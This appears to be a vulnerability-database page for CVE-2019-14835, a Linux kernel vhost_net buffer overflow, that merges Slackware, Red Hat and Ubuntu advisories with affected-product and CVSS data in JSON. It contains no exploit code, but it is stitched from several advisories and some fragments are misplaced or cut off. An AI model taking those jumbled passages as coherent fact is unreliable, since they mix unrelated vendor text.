0e523f42e759ecc2399f36e37672f110 kernel-generic-4.4.199-i586-1.txz ee6451f5362008b46fee2e08e3077b21 kernel-generic-smp-4.4.199_smp-i686-1.txz a8338ef88f2e3ea9c74d564c36ccd420 kernel-headers-4.4.199_smp-x86-1.txz cd9e9c241e4eec2fba1dae658a28870e kernel-huge-4.4.199-i586-1.txz 842030890a424023817d42a83a86a7f4 kernel-huge-smp-4.4.199_smp-i686-1.txz 257db024bb4501548ac9118dbd2d9ae6 kernel-modules-4.4.199-i586-1.txz 96377cbaf7bca55aaca70358c63151a7 kernel-modules-smp-4.4.199_smp-i686-1.txz 0673e86466f9e624964d95107cf6712f kernel-source-4.4.199_smp-noarch-1.txz

Slackware x86_64 14.2 packages: 6d1ff428e7cad6caa8860acc402447a1 kernel-generic-4.4.199-x86_64-1.txz dadc091dc725b8227e0d1e35098d6416 kernel-headers-4.4.199-x86-1.txz f5f4c034203f44dd1513ad3504c42515 kernel-huge-4.4.199-x86_64-1.txz a5337cd8b2ca80d4d93b9e9688e42b03 kernel-modules-4.4.199-x86_64-1.txz 5dd6e46c04f37b97062dc9e52cc38add kernel-source-4.4.199-noarch-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg kernel-*.txz

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash

Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.199-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.199 as the version.

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.

If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

The following packages have been upgraded to a later upstream version: redhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). (CVE-2019-15031)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-3.13.0-173-generic 3.13.0-173.224 linux-image-3.13.0-173-generic-lpae 3.13.0-173.224 linux-image-3.13.0-173-lowlatency 3.13.0-173.224 linux-image-3.13.0-173-powerpc-e500 3.13.0-173.224 linux-image-3.13.0-173-powerpc-e500mc 3.13.0-173.224 linux-image-3.13.0-173-powerpc-smp 3.13.0-173.224 linux-image-3.13.0-173-powerpc64-emb 3.13.0-173.224 linux-image-3.13.0-173-powerpc64-smp 3.13.0-173.224 linux-image-4.15.0-1059-azure 4.15.0-1059.64~14.04.1 linux-image-4.4.0-1054-aws 4.4.0-1054.58 linux-image-4.4.0-164-generic 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-generic-lpae 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-lowlatency 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc-e500mc 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc-smp 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc64-emb 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc64-smp 4.4.0-164.192~14.04.1 linux-image-aws 4.4.0.1054.55 linux-image-azure 4.15.0.1059.45 linux-image-generic 3.13.0.173.184 linux-image-generic-lpae 3.13.0.173.184 linux-image-generic-lpae-lts-xenial 4.4.0.164.143 linux-image-generic-lts-xenial 4.4.0.164.143 linux-image-lowlatency 3.13.0.173.184 linux-image-lowlatency-lts-xenial 4.4.0.164.143 linux-image-powerpc-e500 3.13.0.173.184 linux-image-powerpc-e500mc 3.13.0.173.184 linux-image-powerpc-e500mc-lts-xenial 4.4.0.164.143 linux-image-powerpc-smp 3.13.0.173.184 linux-image-powerpc-smp-lts-xenial 4.4.0.164.143 linux-image-powerpc64-emb 3.13.0.173.184 linux-image-powerpc64-emb-lts-xenial 4.4.0.164.143 linux-image-powerpc64-smp 3.13.0.173.184 linux-image-powerpc64-smp-lts-xenial 4.4.0.164.143 linux-image-server 3.13.0.173.184 linux-image-virtual 3.13.0.173.184 linux-image-virtual-lts-xenial 4.4.0.164.143

Ubuntu 12.04 ESM: linux-image-3.13.0-173-generic 3.13.0-173.224~12.04.1 linux-image-3.13.0-173-generic-lpae 3.13.0-173.224~12.04.1 linux-image-3.13.0-173-lowlatency 3.13.0-173.224~12.04.1 linux-image-3.2.0-143-generic 3.2.0-143.190 linux-image-3.2.0-143-generic-pae 3.2.0-143.190 linux-image-3.2.0-143-highbank 3.2.0-143.190 linux-image-3.2.0-143-omap 3.2.0-143.190 linux-image-3.2.0-143-powerpc-smp 3.2.0-143.190 linux-image-3.2.0-143-powerpc64-smp 3.2.0-143.190 linux-image-3.2.0-143-virtual 3.2.0-143.190 linux-image-generic 3.2.0.143.158 linux-image-generic-lpae-lts-trusty 3.13.0.173.161 linux-image-generic-lts-trusty 3.13.0.173.161 linux-image-generic-pae 3.2.0.143.158 linux-image-highbank 3.2.0.143.158 linux-image-omap 3.2.0.143.158 linux-image-powerpc 3.2.0.143.158 linux-image-powerpc-smp 3.2.0.143.158 linux-image-powerpc64-smp 3.2.0.143.158 linux-image-server 3.2.0.143.158 linux-image-virtual 3.2.0.143.158

After a standard system update you need to reboot your computer to make all the necessary changes.

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.74"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "imanager neteco 6000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r008c20"
      },
      {
        "_id": null,
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "_id": null,
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "_id": null,
        "model": "imanager neteco",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r009c00"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "imanager neteco",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r009c10spc200"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.0"
      },
      {
        "_id": null,
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "_id": null,
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "_id": null,
        "model": "openshift container platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.11"
      },
      {
        "_id": null,
        "model": "aff a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.73"
      },
      {
        "_id": null,
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.1rc1.b080"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.3"
      },
      {
        "_id": null,
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.144"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "_id": null,
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.193"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "_id": null,
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "_id": null,
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.193"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.1rc1.b060"
      },
      {
        "_id": null,
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.0.spc100.b210"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "30"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.rc2.b050"
      },
      {
        "_id": null,
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2.15"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "_id": null,
        "model": "imanager neteco 6000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r008c10spc300"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154565"
      },
      {
        "db": "PACKETSTORM",
        "id": "154538"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2019-14835",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-14835",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.0,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-146821",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2019-14835",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "secalert@redhat.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.6,
            "id": "CVE-2019-14835",
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-14835",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "secalert@redhat.com",
            "id": "CVE-2019-14835",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-146821",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel\u0027s vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. 6.5) - x86_64\n\n3. \n(CVE-2019-14835)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. ==========================================================================\nKernel Live Patch Security Notice 0058-1\nOctober 22, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series           | Base kernel  | Arch     | flavors          |\n|------------------+--------------+----------+------------------|\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | aws              |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | oem              |\n| Ubuntu 18.04 LTS | 5.0.0        | amd64    | azure            |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | aws              |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | azure            |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | lowlatency       |\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux: Linux kernel\n\nDetails:\n\nIt was discovered that a race condition existed in the GFS2 file system in\nthe Linux kernel. A local attacker could possibly use this to cause a\ndenial of service (system crash). (CVE-2016-10905)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nIt was discovered that the USB gadget Midi driver in the Linux kernel\ncontained a double-free vulnerability when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-20961)\n\nIt was discovered that the XFS file system in the Linux kernel did not\nproperly handle mount failures in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2018-20976)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-21008)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel\ndid not properly validate certain Tunneled Direct Link Setup (TDLS). A\nphysically proximate attacker could use this to cause a denial of service\n(Wi-Fi disconnect). (CVE-2019-0136)\n\nIt was discovered that the Linux kernel on ARM processors allowed a tracing\nprocess to modify a syscall after a seccomp decision had been made on that\nsyscall. A local attacker could possibly use this to bypass seccomp\nrestrictions. (CVE-2019-2054)\n\nIt was discovered that an integer overflow existed in the Binder\nimplementation of the Linux kernel, leading to a buffer overflow. A local\nattacker could use this to escalate privileges. (CVE-2019-2181)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local attacker\ncould use this to cause a denial of service. (CVE-2019-10207)\n\nJonathan Looney discovered that an integer overflow existed in the Linux\nkernel when handling TCP Selective Acknowledgments (SACKs). A remote\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-11477)\n\nJonathan Looney discovered that the TCP retransmission queue implementation\nin the Linux kernel could be fragmented when handling certain TCP Selective\nAcknowledgment (SACK) sequences. A remote attacker could use this to cause\na denial of service. (CVE-2019-11478)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-12614)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14814)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14815)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nPeter Pi discovered a buffer overflow in the virtio network backend\n(vhost_net) implementation in the Linux kernel. (CVE-2019-14835)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel                   | Version  | flavors                  |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174            | 58.1     | lowlatency, generic      |\n| 4.4.0-148.174~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-150.176            | 58.1     | generic, lowlatency      |\n| 4.4.0-150.176~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178            | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-154.181            | 58.1     | lowlatency, generic      |\n| 4.4.0-154.181~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-157.185            | 58.1     | lowlatency, generic      |\n| 4.4.0-157.185~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-159.187            | 58.1     | lowlatency, generic      |\n| 4.4.0-159.187~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-161.189            | 58.1     | lowlatency, generic      |\n| 4.4.0-161.189~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192            | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-165.193            | 58.1     | generic, lowlatency      |\n| 4.4.0-1083.93            | 58.1     | aws                      |\n| 4.4.0-1084.94            | 58.1     | aws                      |\n| 4.4.0-1085.96            | 58.1     | aws                      |\n| 4.4.0-1087.98            | 58.1     | aws                      |\n| 4.4.0-1088.99            | 58.1     | aws                      |\n| 4.4.0-1090.101           | 58.1     | aws                      |\n| 4.4.0-1092.103           | 58.1     | aws                      |\n| 4.4.0-1094.105           | 58.1     | aws                      |\n| 4.15.0-50.54             | 58.1     | generic, lowlatency      |\n| 4.15.0-50.54~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55             | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-52.56             | 58.1     | lowlatency, generic      |\n| 4.15.0-52.56~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58             | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-55.60             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67             | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69             | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-64.73             | 58.1     | generic, lowlatency      |\n| 4.15.0-64.73~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-65.74             | 58.1     | lowlatency, generic      |\n| 4.15.0-1038.43           | 58.1     | oem                      |\n| 4.15.0-1039.41           | 58.1     | aws                      |\n| 4.15.0-1039.44           | 58.1     | oem                      |\n| 4.15.0-1040.42           | 58.1     | aws                      |\n| 4.15.0-1041.43           | 58.1     | aws                      |\n| 4.15.0-1043.45           | 58.1     | aws                      |\n| 4.15.0-1043.48           | 58.1     | oem                      |\n| 4.15.0-1044.46           | 58.1     | aws                      |\n| 4.15.0-1045.47           | 58.1     | aws                      